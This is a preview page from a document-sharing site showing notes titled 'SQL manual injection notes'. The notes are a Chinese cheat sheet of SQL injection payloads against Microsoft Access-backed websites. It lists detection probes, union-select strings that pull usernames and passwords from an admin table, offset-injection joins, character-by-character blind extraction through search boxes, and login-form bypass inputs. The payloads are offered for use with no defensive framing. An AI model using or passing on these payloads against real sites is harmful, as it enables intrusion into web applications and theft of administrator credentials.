sql手工注入笔记.docx

下载文档

8
0
约8.52千字
约 7页
2017-11-13 发布于河南
举报
版权申诉
保障服务

sql手工注入笔记.docx

1、本文档共7页，可阅读全部内容。
2、原创力文档（book118）网站文档一经付费（服务费），不意味着购买了该文档的版权，仅供个人/单位学习、研究之用，不得用于商业用途，未经授权，严禁复制、发行、汇编、翻译或者网络传播等，侵权必究。
3、本站所有内容均由合作方或网友上传，本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺！文档内容仅供研究参考，付费前请自行鉴别。如您付费，意味着您自己接受本站规则且自行承担风险，本站不退款、不进行额外附加服务；查看《如何避免下载的几个坑》。如果您已付费下载过本站文档，您可以点击这里二次下载。
4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等，请点击“版权申诉”（推荐），也可以打举报电话：400-050-0827(电话支持时间：9:00-18:30)。

sql手工注入笔记

access手工注入 access注入 access偏移注入 access搜索型注入 access登陆框注入1.判断注入. and 1=1 and 1=2或者 -0 -1看页面的变化2. access注入.联合查询order by 10and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from adminand 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin 3. access偏移注入. 条件须有id字段order by 13and 1=2 union select 1,2,3,4,5,6,7,8,9,* from admin 直到*正常13-9=4 4*2=8 13-8=5and 1=2 union select 1,2,3,4,5,* from (admin as a inner join admin as b on a.id=b.id)4. access爆字段select * from next where id=1 ORDER BY sum(1)只能爆出一个字段如为 bm_username 就可以猜其他的了还可以通过网站后台查看源代码查找字段 5 .access搜索型注入2010%and(select count(*)from mssysaccessobjects)0 and %= //返回正常。access数据库2010%and(select count(*)from admin)0 and %= //返回正常存在admin表2010%and(select count(username)from admin)0 and %= //返回正常,存在username字段2010%and(select count(password)from admin)0 and %= //返回正常,并且存在password字段2010%and(select top 1 len(username)from admin)4 and %= //返回正常username长度大于42010%and(select top 1 len(username)from admin)=5 and %= //返回正常username长度等于52010%and(select top 1 len(password)from admin)=32 and %= //返回正常,密码长度为32位加密。username length 5password length 322010%and(select top 1 asc(mid(username,1,1))from admin)=97 and %= //a以下都是对应位置的ascii的编码，如果不是则返回错误。2010%and(select top 1 asc(mid(password,1,1))from admin)=48 and %=,2010%and(select top 1 asc(mid(password,2,1))from admin)=102 and %=2010%and(select top 1 asc(mid(password,3,1))from admin)=101 and %=2010%and(select top 1 asc(mid(password,4,1))from admin)=102 and %=这个查询太费时间了可以试下union联合查询2010% order by 10 and %=2010% and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin and %=2010%and 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin and %=6. access登陆框注入1. a or(select count(*) from admin)0 and 1=1 2. a or(select count(username) from admin)0 and 1=1 3. a or(select count(password) from admin)0 and 1=1 这个查询太费时间了可以试下union联合查询a union select 1,2,3,4,5,6,7,8,9,10 from admin and 1=1 a union select 1,username,3,4,password,6,7,8,9,10 from admin and 1=1 7